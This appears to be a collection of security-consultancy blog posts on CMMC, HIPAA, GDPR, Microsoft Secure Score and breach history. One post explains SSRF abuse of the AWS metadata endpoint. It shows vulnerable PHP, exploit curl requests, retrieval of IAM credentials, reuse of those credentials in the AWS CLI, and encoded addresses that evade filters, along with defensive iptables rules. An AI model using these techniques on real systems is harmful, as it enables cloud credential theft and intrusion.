From a quick assessment of what has been published thus far on the CMMC regulation and its overall goal, it appears that contractors' lack of information security will no longer be tolerated by the DoD. Following the regulation's public introduction in January of 2020, new contractual requirements are expected to include CMMC starting in June of 2020, with enforcement for current contractors starting in September of 2020. The proposed structure for achieving a CMMC level of security is somewhat advanced, but not unprecedented. One of the more significant moves in this effort is the requirement that entities be audited by an independent 3rd party before any certification is awarded. The audit will likely require evidence to be presented showing that the correct level of security controls is present and functioning as required. Although this regulation is new, it will likely be composed of existing NIST controls, as chosen by the DoD.

Given that the purpose of the Federal Information Security Modernization Act (FISMA) is to protect all federal data by means of the NIST controls, it is hard to conceive of any other security framework being used to meet the goals of CMMC. Even at the assurance level for the security controls, we find an interesting item for auditors: they will be required to attest to the accuracy of their findings. This step is likely in place to link auditors directly to an organization in the event of a control failure or data breach. As such, it appears that the audit process will be evidence intensive, with audit artifacts and audit trails required to demonstrate compliance with the selected controls.

So, how did we get here? After a review, the DoD determined that only 1% of contractors actually have some form of proper data protection in place, which naturally raises concerns over the military's highly sensitive data being secured against the nation-states that wish to obtain it. These nation-states and their activities are collectively known as the 'advanced persistent threat' (APT), as they look to obtain targeted data at almost any cost, including working to infiltrate systems for years. Additionally, there is the threat from criminal actors pursuing this data so that it can be sold on the black market to the highest bidder. Either of these attackers represents a significant threat to military contractors, mainly due to the lack of appropriate information security controls.

Recently, the Department of Defense (DoD) announced a new initiative for the information security component of defense contractors, subcontractors, and the supply chain for DoD projects. The regulation's goal is to secure the complete DoD supply chain, which has had historical issues with keeping sensitive data secure. Currently, DoD contractors and subcontractors are obligated to protect the data they are entrusted with by having an information security program in place that deploys the National Institute of Standards and Technology (NIST) Special Publication (SP) 800-171 security controls. Despite those obligations, contractors have consistently had issues protecting the military data entrusted to them, resulting in data exposure and breaches.

The concerns over data security materialized in stark reality when a civilian contractor was breached early in 2018, resulting in the exposure of more than 600 gigabytes of highly sensitive information to China through its cyberattack efforts. This breach significantly impacted the US Navy's Sea Dragon project for the submarine fleet and the overall capability for conducting subsurface warfare operations. The exposure also included the breach of the project's electronic warfare library, which, as the name implies, contains a notable amount of highly classified data. What cannot be overstated is the value of that data loss, as it represents untold years of the United States' hard-won knowledge and expertise in several matters of science, research, and the advancement from associated discoveries. It appears that, due to this breach and others like it, and the assessment of DoD contractors' poor computer security posture, the DoD has been forced to take a stance of “no tolerance” for gaps within information security programs.

This breach and other incidents like it demonstrate that civilian contractors have not taken appropriate actions to properly deploy information security controls to protect DoD data. Nor is this a defense-sector or DoD-only issue: the loss of intellectual property (IP) across the nation has been ongoing for a number of years, with the public only recently gaining a small insight into this major issue. What needs to be understood is the impact of the country's IP loss to the rest of the globe, driven by an apparent lack of concern for securing company-owned systems and data. For some, the idea of IP loss is difficult to grasp or to put in easy-to-understand terms; however, we can put some measurement to it over the past several years. From reports, the loss of IP has a measurable financial impact, with estimates placing the cost of stolen IP at $600 billion in lost revenue for the United States. That includes several billions of dollars lost to counterfeit goods that compete not only on the domestic market, but on the international market as well.

As we move forward in the digital age, the critical nature of having secured IT systems becomes more and more glaring. It seems clear that information security will continue to have a large impact on all business sectors, with the military industry being the first called on to fully secure its systems. It is very likely this trend will expand outward, as people continue to express overwhelming concern over their personal data and how systems and applications collect and monitor their actions and activities. Companies that decide to get ahead of this significant problem are showing a commitment to long-term investment that should have a positive impact on not only profit, but also revenue in the years to come.

Once full details on CMMC are made available, we will look to post a blog that gives a clearer definition as to what the CMMC requirements entail.

One of the greatest yet least understood dangers facing any cloud-based application is the combination of an SSRF vulnerability and the AWS Metadata endpoint. As this write-up from Brian Krebs explains, the breach at Capital One was caused by an SSRF vulnerability that was able to reach the AWS Metadata endpoint and extract the temporary security credentials associated with the EC2 instance's IAM Role. These credentials enabled the attacker to access other Capital One assets in the cloud, and as a result, over 100 million credit card applications were compromised.

The Vulnerabilities

In order to fully understand the impact of this cloud one-two punch, it is necessary to break the attack chain down into its components: SSRF and the AWS Metadata endpoint. First, Server Side Request Forgery (SSRF) is a vulnerability that allows an attacker to control the destination address of an HTTP request sent from the vulnerable server. The attacker can often see the response from the request as well, though not always (see Blind SSRF). This allows the attacker to use the vulnerable server as a proxy for HTTP requests, which can result in the exposure of sensitive subnets and services.

Consider the following PHP code:

<?php
// Fetch a URL whose hostname comes directly from attacker-controlled input
echo file_get_contents("http://".$_GET['hostname']."/configureIntegration.php");
?>

The code above sends an HTTP request to the hostname specified by the attacker in the "hostname" GET parameter. Logic like this is commonly found in the "Integrations" section of applications. This code is vulnerable to SSRF. Consider the following scenario: There is a sensitive service running on the loopback interface of the vulnerable server. This is emulated by the following configuration:
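A minimal way to stand up such a loopback-only service, reconstructed from the terminal session shown further below (the directory, port, and bind address are taken from that output):

mkdir /tmp/secret && cd /tmp/secret
echo "This is only available on a loopback interface" > secret.html
python3 -m http.server 8081 --bind 127.0.0.1    # listens on 127.0.0.1 only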

The PHP code above is hosted on the internet-facing web server. When an attacker discovers this endpoint, they might use the following to grab data from the internal application:

curl "http://vulnerableserver.com/ssrf.php?hostname=localhost:8081/secret.html?"

Note the trailing question mark: it turns the "/configureIntegration.php" suffix appended by the PHP code into a harmless query string. The request results in a hit on the internal HTTP server:

┬─[justin@parrot:/t/secret]─[02:29:48 PM]
╰─>$ python3 -m http.server 8081 --bind 127.0.0.1
Serving HTTP on 127.0.0.1 port 8081 (http://127.0.0.1:8081/) ...
127.0.0.1 - - [15/Aug/2019 14:30:56] "GET /secret.html?/configureIntegration.php HTTP/1.0" 200 -

and return the following to the attacker:

This is only available on a loopback interface

Now that the danger of SSRF is clear, let's look at how this vulnerability may be exploited in the context of the cloud (AWS in particular).

Due to the dynamic nature of the cloud, server instances (EC2, for example) need some way to get basic information about their configuration in order to orient themselves to the environment in which they were spun up. Out of this need, the AWS Metadata endpoint was born. This endpoint (169.254.169.254), when hit from any EC2 instance, reveals information about that instance's configuration. Quite a lot of information is available, including the hostname, external IP address, metrics, LAN information, security groups, and the IAM (Identity and Access Management) credentials associated with the instance. It is possible to retrieve these security credentials by hitting the following URL, where [ROLE] is the IAM role name:

ec2-user@kali:~$ curl 169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE]
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-15T18:13:44Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAN0P3n0W4y1nv4L1d",
  "SecretAccessKey" : "A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE",
  "Token" : "AgoJb3JpZ2luX2VjEJv//////////wEaCXVzLWVhc3QtMSJHMEUCIEX46oh4kz6AtBiTfvoHGqfVuHJI29ryAZy/wXyR51SAiEA04Pyw9HSwSIRNx6vmYpqm7sD+DkLQiFzajuwI2aLEp4q8gMIMxABGgwzNjY4OTY1NTU5NDkiDOBEJDdUKxKUkgkhGyrPA7u8oSds5hcIM0EeoHvgxvCX/ChiDsuCEFO1ctMpOgaQuunsvKLzuaTp/86V96iZzuoPLnpHHsmIUTrCcwwGqFzyaqvJpsFWdv89YIhARAMlcQ1Cc9Cs4pTBSYc/BvbEFb1z0xWqPlBNVKLMzm2K5409f/KCK/eJsxp530Zt7a1MEBp/rvceyiA5gg+6hOu65Um+4BNT+CjlEk3gwL6JUUWr9a2LKYxmyR4fc7XtLD2zB0jwdnG+EPv7aDPj7EoWMUoR/dOQav/oSHi7bl6+kT+koKzwhU/Q286qsk0kXMfG/U95TdUr70I3b/L/dhyaudpLENSU7uvPFi8qGVGpnCuZCvGL2JVSnzf8327jyuiTF7GvXlvUTh8bjxnZ8pAhqyyuxEW1tosL2NuqRHmlCCfnE3wLXJ0yBUr7uxMHTfL1gueEWghymIGhAxiYIKA9PPiHCDrn4gl5AGmLyzqxenZgcNnuwMjeTnhQ0mVf7L8PR4ZWRo9h3C1wMbYnYNi5rdfQcByMIN/XoR2J74sBPor/aObMMHVnmpNjbtRgKh0Vpi48VgXhXfuCAHka3rbYeOBYC8z8nUWYJKuxv3Nj0cQxXDnYT6LPPXmtHgZaBSUwxMHW6gU6tAHi8OEjskLZG81wLq1DiLbdPJilNrv5RPn3bBF+QkkB+URAQ8NBZA/z8mNnDfvESS44fMGFsfTIvIdANcihZQLo6VYvECV8Vw/QaLP/GbljKPwztRC5HSPe6WrC06LZS9yeTpVGZ6jFIn1O/01hJOgEwsK7+DDwcXtE5qtOynmOJiY/iUjcz79LWh184My58ueCNxJuzIM9Tbn0sH3l1eBxECTihDNbL13v5g+8ENaih+f3rNU=",
  "Expiration" : "2019-08-16T00:33:31Z"
}
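If the attacker does not already know the role name, the metadata service will reveal that too: requesting the security-credentials path with nothing appended returns the name of the attached role.

curl 169.254.169.254/latest/meta-data/iam/security-credentials/    # returns the IAM role name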

The credential response above contains several things: the AccessKeyId, SecretAccessKey, and Token for this account. Using these credentials, an attacker can log in to AWS and compromise the server and potentially many other assets. In the case of the Capital One breach, these credentials were used to access an S3 bucket which contained millions of records of user information.
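Abusing the stolen credentials is as simple as exporting them into an AWS CLI session. A sketch using the placeholder values from the response above (an attacker would substitute the stolen values; the session token is truncated here):

export AWS_ACCESS_KEY_ID=ASIAN0P3n0W4y1nv4L1d
export AWS_SECRET_ACCESS_KEY=A5tGuw2QXjmqu8cTEu1zs0Dw8yt905HDCzrF0AdE
export AWS_SESSION_TOKEN=AgoJb3JpZ2luX2VjEJv...    # truncated
aws sts get-caller-identity    # confirm which role the session now holds
aws s3 ls                      # enumerate any S3 buckets the role can read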

In summary, the poor implementation of the metadata service in AWS allows an attacker to easily escalate an SSRF vulnerability into control of many different cloud assets. Other cloud providers like Google Cloud and Microsoft Azure also provide a metadata service endpoint, but requests to those endpoints require a special header, which prevents most SSRF vulnerabilities from accessing the sensitive data there.

How to prevent such a vulnerability

In order to prevent this type of vulnerability from being exploited, firewall rules need to be put in place to block off the metadata endpoint. This can be done using the following iptables rule:

sudo iptables -A OUTPUT -d 169.254.169.254 -j DROP

This will prevent any access to this IP address. However, if access to the metadata endpoint is required, it is also possible to exempt certain users from this rule. For example, the iptables rule below would allow only the root user to access the metadata endpoint:

sudo iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP
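Either way, the block is easy to verify from a shell that should be denied; with the DROP rule in place, the request should time out instead of returning metadata:

curl --max-time 3 http://169.254.169.254/latest/meta-data/ || echo "metadata endpoint blocked"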

These blocks MUST be done at the network level - not the application level. There are too many ways to access this IP address. For example, all of these addresses below refer to the metadata service:

http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
http://169.254.169.254.xip.io/ DNS Name
http://A.8.8.8.8.1time.169.254.169.254.1time.repeat.rebind.network/ DNS Rebinding (8.8.8.8 -> AWS Metadata)

And there are many more. The only reliable way to address this issue is through a network level block of this IP.

The easiest way to check the IAM roles associated with each EC2 instance is to navigate to the EC2 Dashboard in AWS and add the column "IAM Instance Profile Name" by clicking the gear in the top right-hand corner. Once the IAM role for each EC2 instance is easily visible, it is possible to check whether these roles are overly permissive for what is required of that EC2 instance.
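For more than a handful of instances, the same check can be scripted. A sketch using the AWS CLI (assuming credentials with the ec2:DescribeInstances permission; instances with no profile show as None):

aws ec2 describe-instances \
  --query 'Reservations[].Instances[].[InstanceId,IamInstanceProfile.Arn]' \
  --output table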

It is also imperative to understand the pivoting potential of these IAM Roles. If it is possible that an SSRF, XXE, or RCE vulnerability was exploited on any cloud system, the logs for the IAM Role associated with this instance must be thoroughly audited for malicious intent. To avoid a breach like Capital One, reach out to SynerComm.

Medical community challenge:

In a business environment where resources are limited, compliance requirements abound, and budgets are constantly challenged to meet cost containment targets, the complexity of the regulations your business is obligated to comply with can present a challenge. This challenge becomes even more difficult within the dynamic environment of hospitals, doctors’ offices, and all supporting elements of the medical profession. A key element in facing this challenge is understanding what defines Protected Health Information (PHI) and what qualifies an organization as a HIPAA Covered Entity.

In broad terms, PHI is information that deals, or is associated in any way, with the medical details or medical records of an individual. For the term “Electronic Protected Health Information” (ePHI), the definition doesn’t change much, as it simply encompasses the information or data being maintained in an electronic format, as on a computer or any other digital device. To clarify PHI more precisely, the Privacy Rule states it is “any information held by a covered entity which concerns health status, the provision of healthcare, or payment for healthcare that can be linked to an individual”. Most people respond with “wow, that sounds like it covers a lot” – which it does. Not only is health-centric data covered by HIPAA, but so is data that directly identifies a person, or a “personal identifier”. To get our arms around this topic, we can see what HIPAA considers a personal identifier by reviewing Sections 164.514(b) and (c) of the Privacy Rule, which list the following 18 data points as personal identifiers:

  1. Names
  2. Geographic subdivisions smaller than a state
  3. Dates (other than year) directly related to an individual
  4. Telephone numbers
  5. Fax numbers
  6. Email addresses
  7. Social Security numbers
  8. Medical record numbers
  9. Health plan beneficiary numbers
  10. Account numbers
  11. Certificate or license numbers
  12. Vehicle identifiers and serial numbers, including license plate numbers
  13. Device identifiers and serial numbers
  14. Web URLs
  15. IP addresses
  16. Biometric identifiers, including finger and voice prints
  17. Full-face photographs and comparable images
  18. Any other unique identifying number, characteristic, or code

Keep in mind the above is not an exhaustive list, as it is HIPAA's definition that drives what can be considered a personal identifier. This list is a starting point for what needs to be considered when looking to secure, and keep private, the PHI and ePHI within your organization. These are the data sets that need to be located and tagged so that they can be properly secured. A good methodology is to review the official definition and decide whether a particular data element qualifies as protected under HIPAA. It is advisable to err on the side of caution and include data that “could be” viewed as sensitive, because making the wrong determination can easily lead a company to paying HIPAA fines and penalties. The broader approach may give some data an extra layer of protection it does not strictly need, but that is likely a small price to pay when considering the potential fines and penalties – as was seen with Anthem Inc., reported to have paid $115 million to settle lawsuits over its HIPAA information breach.

This brings us to the next key element for HIPAA – which organizations are obligated to adhere to HIPAA, and am I one?

Here again, we see that HIPAA protections apply to a wide array of organizations and businesses – obviously, entities that are linked to, or perform some activity with, health information. It is this connection with the data that brings in the HIPAA regulation and its requirements, as described below. Organizations that deal with medical data are officially termed “covered entities”. Any contractor, vendor, or 3rd-party relationship with a covered entity that involves PHI or ePHI falls under the official term “business associate”. The requirements of HIPAA extend to business associates through the covered entity and are required to be clearly defined within a Business Associate Agreement (BAA), which is to be a component of the contractual agreement between the two organizations.

For clarity on what qualifies as a covered entity:

Covered entities are the individuals, institutions, or organizations that maintain patient healthcare or payment information, or that would reasonably be expected to come into contact with PHI in the course of their daily duties – mostly healthcare providers, health plans, and healthcare clearinghouses. Examples of covered entities include doctors, clinics, hospitals, pharmacies, and nursing homes (providers); health insurance companies, HMOs, company health plans, and government programs such as Medicare and Medicaid (health plans); and entities that process nonstandard health information received from another entity (clearinghouses).

What about 3rd-party vendors? If a 3rd party is engaged by a covered entity, then a Business Associate Agreement (BAA) is required, per HIPAA. A BAA is a focused document that addresses the requirements of HIPAA and acknowledges that the business relationship between the two parties will involve PHI or ePHI. To help define where these components apply, here is a more detailed explanation of a business associate:

A Business Associate is a person or entity, other than a workforce member, who performs certain contractual functions or activities for a covered entity, or provides certain services to a covered entity, when those functions involve the access to, or the use or disclosure of, PHI. Per HIPAA, Business Associate functions and activities include (but are not limited to) creating, receiving, maintaining, or transmitting protected health information for functions including claims processing or administration, data analysis, processing or administration, utilization review, quality assurance, patient safety activities, billing, benefit management, practice management, and repricing.

It should be clear that the protections for HIPAA-defined medical information and data follow that data, no matter where it resides or who handles it. If your organization has any dealings or contact with medical companies or entities, and you do not have HIPAA protections in place, it would be worthwhile to perform a thorough review to be certain. That review should be fully documented and presented to proper legal counsel to consider and reach a definitive conclusion as to the obligations your company has under the HIPAA regulation.

Too often, organizations do not have a good understanding of what data resides within their systems, and this leads to a lack of knowledge of the legal obligations the company has committed itself to. Don’t let this happen to you – leverage the knowledge presented here, along with the information that is publicly available, to make a clear determination as to what information security protections your company needs.

Medical community challenge:

In a business environment where resources are limited, compliance requirements abound, and budgets constantly struggle to meet cost containment targets, the complexity of the regulations your business is required to comply with can present a challenge. This challenge becomes even more difficult within the dynamic environment of hospitals, doctors’ offices, and all of the supporting elements of the medical profession. Of course, these efforts ultimately serve the focal point of the medical community – the patient – and the critical, life-saving procedures performed on the patient's behalf. However, the digital age we have moved into over the past 20 years, despite the convenience it offers, comes with risks. Patients have suffered the compromise of personal information, and the patient population has expressed considerable concern regarding how their medical data is handled.

These concerns are not without due cause, given the sensitive business of life support that medical organizations have chosen to engage in and the information involved with any medical procedure or activity. Those concerns are partly expressed in the Health Insurance Portability and Accountability Act (HIPAA), which compels medical businesses to treat the data they possess with certain protections. We will break down the predominant components of the HIPAA regulation as a basis for gaining a clear understanding of the drivers behind this law. In later postings on this topic, we will explore a strategy to align your organization to the information security requirements defined within HIPAA, HITECH, and the Omnibus Rule.

The Health Insurance Portability and Accountability Act of 1996 establishes requirements for healthcare organizations with respect to ensuring the security and privacy of protected health information (PHI) and electronic protected health information (ePHI). Broadly speaking, the overarching HIPAA principle for this type of data is that it is to remain private: only people who have a definitive need for the data should be able to access it. It should go without saying that the only way to provide any kind of privacy is through the effective deployment of security measures that restrict access to, and exposure of, the data. The principles of privacy and security are irrefutably linked, as you cannot have one without the other, which explains the logic behind the two better-known rules of HIPAA that we will cover below.

There are a number of rules recognized within HIPAA – or what most people have come to call HIPAA, which usually encompasses other healthcare data regulations as well (e.g., HITECH and the Omnibus Final Rule). Some of the rules are better known than others. Because they were the first established with HIPAA, the best known are probably the Privacy Rule and the Security Rule. However, that’s not where the rules stop, as there have been regulatory updates to HIPAA as the issues around the handling of medical data have become better understood. It can be a challenge to keep track of all of these rules:

  1. The Privacy Rule
  2. The Security Rule
  3. The Enforcement Rule
  4. The Breach Notification Rule (added with HITECH)
  5. The Omnibus Final Rule

Now that you have a baseline understanding of what HIPAA is comprised of, we can move on to another primary component of HIPAA: understanding the criteria for PHI and ePHI, as well as understanding whether you and your organization fall under the HIPAA regulation.
NEXT UP: What is PHI or ePHI and who has to abide by HIPAA?

Microsoft Secure Score. If you’re an IT administrator or security professional in an organization that uses Office 365, then you’ve no doubt used the tool or at least heard the term. It started as Office 365 Secure Score, but it was renamed in April 2018 to reflect a wider range of elements being scored.

What does it do? The tool looks at configurable settings and actions primarily within your Office 365 and Azure AD environment, and awards points for selections that meet best practices. In their words, “From a centralized dashboard you can monitor and improve the security for your Microsoft 365 identities, data, apps, devices, and infrastructure.”

But what doesn’t Microsoft Secure Score do? Microsoft is very good at telling you the great things its products can do, so I won’t repeat them here. The concept is sound, and I applaud them for giving users a tool that prioritizes secure configurations. They have come a long way from having auditing turned off by default in their products, e.g., Server 2000. I will point out why Microsoft Secure Score isn’t enough when it comes to understanding and testing the security of your Microsoft 365 environment.

Reason number 1:  The fox shouldn’t guard the hen house.

I am a Certified Public Accountant (CPA), and as such, I’ve spent a good portion of my life performing audits and assessments. A key independence rule CPAs abide by is: an auditor must not audit his or her own work. Microsoft isn’t exactly independent when scoring its own products' settings and capabilities. The financial motivation exists for Microsoft to set up a scoring system that makes users feel good about using Microsoft products. Interoperability and performance will always be a higher priority than security.

This is furthered by the scoring system's setup, which unlocks higher point opportunities with higher-priced subscriptions. For example, Microsoft Cloud App Security and Azure Advanced Threat Protection are unlocked with E5 licenses, or as a $5.50 per-user-per-month add-on to an existing E3 license. This can be as much as a 70% price increase. If you want more chances to raise your overall score and a higher score ceiling, spend more money… a very beneficial side effect for Microsoft.

Also, remember that Secure Score reflects a Microsoft opinion and its subjective value for the security controls it believes are important. This differs from widely accepted standards from organizations like NIST (National Institute of Standards and Technology) or CIS (Center for Internet Security), which are vendor neutral and have been refined, improved, and evolved over time.

Reason number 2:  No two environments are alike.

First, let me say that Secure Score can be dented and bent to fit different environments. Scoring for certain areas can be manually entered if you have a third-party solution for a control, and it is incumbent on the person checking those controls to match what Secure Score is asking for. This is an all-or-nothing proposition, as indicated within Secure Score: “Marking as resolved through third-party indicates that you have completed this action in a non-Microsoft app, and will give you the full point value of this action.”

This is a key area where the Secure Score blanket fails to keep all areas of the entity covered and warm. There are bound to be components and configuration requirements that don’t quite fit what Secure Score evaluates or how it is scored. Think of the myriad application combinations that handle Customer Relationship Management (CRM), Mobile Device Management (MDM), Security Information and Event Management (SIEM), Data Loss Prevention (DLP), and Multifactor Authentication (MFA), just to name a few. An independent assessment of the environment that references best-practice hardening guides for the specific products comprising the solution is the only way to complete a proper evaluation.

Reason number 3:  Security is a journey, and a scorecard makes it a destination.

Don’t get me wrong, I like scores and grades. CPAs generally like to measure and quantify things. Secure Score quantifies security, gives you trends over time on your score, and even allows you to measure your score against others based on a global average, industry average, and similar seat-count average.

What I don’t like is how the scores can be manipulated, or how they can be construed. If the O365 administrator wants to improve their percentage of points achieved, the simplest way is to select “ignore” for the scoring areas that they have earned 0 points. Per Secure Score documentation, “Once you ignore an improvement action, it will no longer count toward the total Secure score points you have available.” Lower the denominator, keep the numerator, and poof! We are more secure. Or are we?

Executives looking at a scorecard may also be satisfied once it has reached a certain percentage of the total available. A project which will move the Secure Score from 650 out of 807 points to 710 out of 807 points appears to make the company about 8% more secure to a non-security decision maker handling the company budget. That project may not make the cut. In reality, any scoring shortage could represent a critical configuration issue that puts information assets at risk. That point may get lost if the focus is score.

Reason number 4:  A by-product of automated security is a false sense of it.

We hear stories all the time about breach activities that were being reported by automated logging systems, except no one was looking at the logs. IT management puts a tool in place and checks a box that implies the organization is secure in that area. Secure Score is ripe for this. Several improvement actions that will increase your score involve reviewing reports. When a link for a report is clicked, Secure Score assumes the report was reviewed and awards points. To keep the points, the link must be clicked within specific time intervals from within the Secure Score user interface, but this process does not record what was reviewed, or any notes or actions resulting from the review. There is no substitute for the actual review process and confirming that the review is happening.


Also consider an environment made up of multiple applications from different vendors where automated security evaluations, like Secure Score, are put in place. Each application that makes up the system interacts with other applications, potentially creating security control blind spots – for example, an email system that hands off outbound email to a 3rd-party DLP solution. Are there security holes in the process that transfers data in and out of the DLP application? Identifying those weaknesses requires a holistic view, measured against currently accepted best practices, that just isn’t offered by Secure Score or any other automated solution.

In conclusion, I think Secure Score has a place in monitoring and evaluating an organization’s information security posture. Microsoft is taking recommendations from its user base and is working to improve Secure Score’s results and widen its coverage. It is a barometer of an information security environment that could produce important information when properly utilized.  

The bottom line, though, is that it is just one tool. It cannot replace a diligent information security program or, at a higher level, an information security management system. Independent assessment and review of controls, policies, procedures, and the people managing the environment work in tandem to assure the confidentiality, integrity, and availability of an organization's information assets. Consider the diversity of an organization's landscape:

These areas are all interdependent, yet all have their own unique traits and ways to be assessed and secured.  No one measurement tool is enough.

By Jeffrey T. Lemmermann, CPA, CISA, CITP, CEH - Information Assurance Consultant

GDPR has been in place since May 25th, 2018 and has already been used in legal actions against companies, with over 200,000 cases reported within this first year. The law is expected to make a notable impact on companies, as it carries considerable fines and penalties; even compared to HIPAA and FISMA, GDPR has the most threatening teeth of any law to date. Even before GDPR came into full force, information security infractions had been getting more attention from multiple angles. There have been some examples of how expensive this can get, as seen with Alphabet and its $9.4bn in fines over the past 3 years. It would appear from these recent events that information security is rising to a point of serious contemplation for businesses worldwide.

However, this should not be a news flash by any means. The implementation of a serious data protection law by the European Union has been in development for some time now (starting in 1995). Most notably, the now infamous “Right to be forgotten” was generating news and conversation on this very topic. Even still, as noted above, companies seem to have been caught flat-footed and have had to pay dearly for infractions.

GDPR drives the idea, at least in part, that information is a business asset, and as such, businesses are obligated to manage that asset in a manner that will not bring harm to its customers and employees. The public has voiced its concerns numerous times, indicating that loss of privacy has a legitimate ability to cause harm to an individual. GDPR gives those voices traction to hold organizations accountable for lack of proper management, security, and ultimately privacy of their Personally Identifiable Information (PII).

So, how can a company successfully meet the requirements of GDPR? Let’s explore the most viable answer to that question.

As a general principle of information security, evidence is the best method to prove how an organization deploys security controls. GDPR is no exception, as it repeatedly calls out the requirement to be able to “demonstrate compliance”, as seen in Chapter 2, Article 5 of the regulation, where the principles of processing personal data are addressed. This evidence is also known as ‘audit artifacts’ or ‘audit trails’ within other compliance frameworks and among the audit community in general. Not surprisingly, within the United States, the requirement for audit artifacts is also seen in regulation, namely HIPAA and FISMA, both of which use the NIST standards to achieve security. The HIPAA-focused security controls are seen in NIST SP 800-66, with FISMA using NIST SP 800-53 and tying in the NIST Cybersecurity Framework to round out an information security program. Both regulations thus use the NIST security control base, which in turn supports privacy for IT systems and data.

Which brings us to the next important question: “What about privacy, isn’t that part of the GDPR?” Excellent point. Here again, NIST shows strength as a framework, as SP 800-53, rev 4, includes privacy controls in Appendix J. When held up against the extensive GDPR requirements, it is clear that these privacy controls can easily be leveraged to support the goals of GDPR. Some example control families from NIST’s Appendix J:

  1. AP – Authority and Purpose
  2. AR – Accountability, Audit, and Risk Management
  3. DI – Data Quality and Integrity
  4. DM – Data Minimization and Retention
  5. IP – Individual Participation and Redress
  6. SE – Security
  7. TR – Transparency
  8. UL – Use Limitation

Naturally, this leads our conversation to “where do I need to apply these controls?” The data identified for protection by GDPR and NIST is broadly understood as Personally Identifiable Information (PII), and both regulations have similar descriptions; GDPR simply calls it “Personal Data”. GDPR appears to have the broader of the two definitions, as seen below:

GDPR PII:  ‘personal data’ means any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person;

GDPR (article 4, Definitions, paragraph 1)

NIST PII: (Personally Identifiable Information): Information which can be used to distinguish or trace the identity of an individual (e.g., name, social security number, biometric records, etc.) alone, or when combined with other personal or identifying information which is linked or linkable to a specific individual (e.g., date and place of birth, mother’s maiden name, etc.).

For any company system, these are the data sets that you want to ‘tag’ or search for to ensure that the proper protections are in place. Once that footprint is well understood, you have the starting point for deploying your security controls and for checking that the privacy controls are in place. In the case of GDPR, the privacy controls repeat the requirement that signed consent be obtained from the data subject (much like HIPAA), with a number of notable exceptions – so be certain to review them for a full understanding. When considering how to tackle the requirements of GDPR, FISMA, HIPAA, or any other information security law or concern, the best place to look, in my opinion, is NIST. NIST not only offers the most complete, thorough, and well-researched controls; it is also the framework recognized by the US government and federal courts. Putting NIST controls in place puts any company in an advantageous position, not only for being able to meet the requirements of a government contract, but also for demonstrating the positive actions the company takes regarding information security if ever questioned in court.
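As a trivial illustration of that ‘tagging’, even a crude pattern search can begin to surface unprotected PII on a file share. This is a sketch only: the path is hypothetical, the pattern matches US Social Security-style numbers, and a real data discovery tool goes much further.

grep -rEl '[0-9]{3}-[0-9]{2}-[0-9]{4}' /mnt/fileshare    # list files containing SSN-like patterns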

GDPR can offer some insight into how the overall public views information security, and how that scope is more expansive than one might initially think. Interestingly, GDPR addresses an area that came as a surprise to me, centered on the use of ‘junk mail’ and spam. Both are addressed within the regulation, which in turn will reduce the amount of unwanted traffic across your inbox, as well as your mailbox (if you reside in the EU).

Overall, from a review of the regulation and associated writings on the subject, as well as from knowledge of the federal-level protections, GDPR is very much in line with the principles of FISMA, if not directly in line with some of its stated requirements. To date, there is no officially identified framework to address the GDPR requirements, and based on my assessment, it makes the most sense to look to the NIST framework to address this shark-toothed law. Not to mention, if you have any federally sourced data on your systems, FISMA is already in play within your organization, which requires NIST protections to be in place. As an added bonus, if you have no other data privacy or security concerns beyond GDPR and you are based within the U.S., deploying NIST puts you in alignment with the only such law within the country (currently). As several people have already stated, the introduction of GDPR will most likely result in a similar, if not more robust, new regulation within the United States. So, if you’re based in the U.S., buckle up; the ride is most likely not over.

In the end, addressing GDPR is not insurmountable – it simply is an area that requires a well-thought-out, managed approach and plan, as is true for many areas in business. Consider these items to start that process:

  1. Review the GDPR regulation and/or gain knowledge on where it applies to your company, possibly accomplished via a mapping exercise
  2. Review the security and privacy controls from NIST and determine where significant gaps exist in your current security and privacy posture
  3. Begin remediation of the gaps, tracking your progress to understand (and start to limit) your company's exposure to GDPR infractions

SynerComm can assist you with assessing your security or privacy controls status to address any framework, including PCI-DSS, FISMA or HIPAA. Contact us today for assistance on your information security needs!

Are you using a framework to establish your information security program? If not, I get it; it’s complicated. On second thought, have you lost your mind?

I’ve been there. A number of years ago, while resolving to better document and organize a rapidly developing network, I began researching frameworks, mainly ISO and NIST. How many pages? What??? That is just the description book; there is an implementation novel as well?

If you are starting from scratch, there is a knowledge barrier that appears to be very steep. Once you see it, you undoubtedly ask yourself, “is it worth the climb?”  Then, the next time you get on an airplane, ask yourself, “are pre-flight checklists worth the effort?”

A pre-flight checklist exists to ensure that all the requirements for a safe flight are in place before the plane leaves the ground. A pretty sound idea, since after it leaves the ground, it’s kind of too late.

I am squarely on the side that it is worth it, and I can make the case that all corporate IT breaches could have been avoided, or at the very least minimized, with a properly selected and implemented framework. Why? Because mature frameworks contain controls, situations, and steps that you cannot think of on your own. They are designed to help prepare for the obvious and the unforeseen.

Consider the Target breach from 2013. This was a breach that started with a 3rd party contractor and ultimately led to the compromise of Personally Identifiable Information (PII) of 70 million customers along with data for 40 million credit and debit cards. There are many accounts of what happened during this event, but I’m going to draw a basic chain of events from the most widely accepted descriptions for our scenario:

  1. 3rd Party fell victim to malware attack and had their vendor credentials compromised.
  2. Credentials used to access Target’s hosted vendor site and find web application vulnerability.
  3. Exploit allowed attackers to upload tools to key systems on Target’s network.
  4. New credentials with administrator level access were created within the network.
  5. Databases identified that contained PII. Data copied to extraction point.
  6. Install malware on key systems to scan memory and capture credit card information.
  7. Credit card information copied to extraction point. Data extracted via FTP.

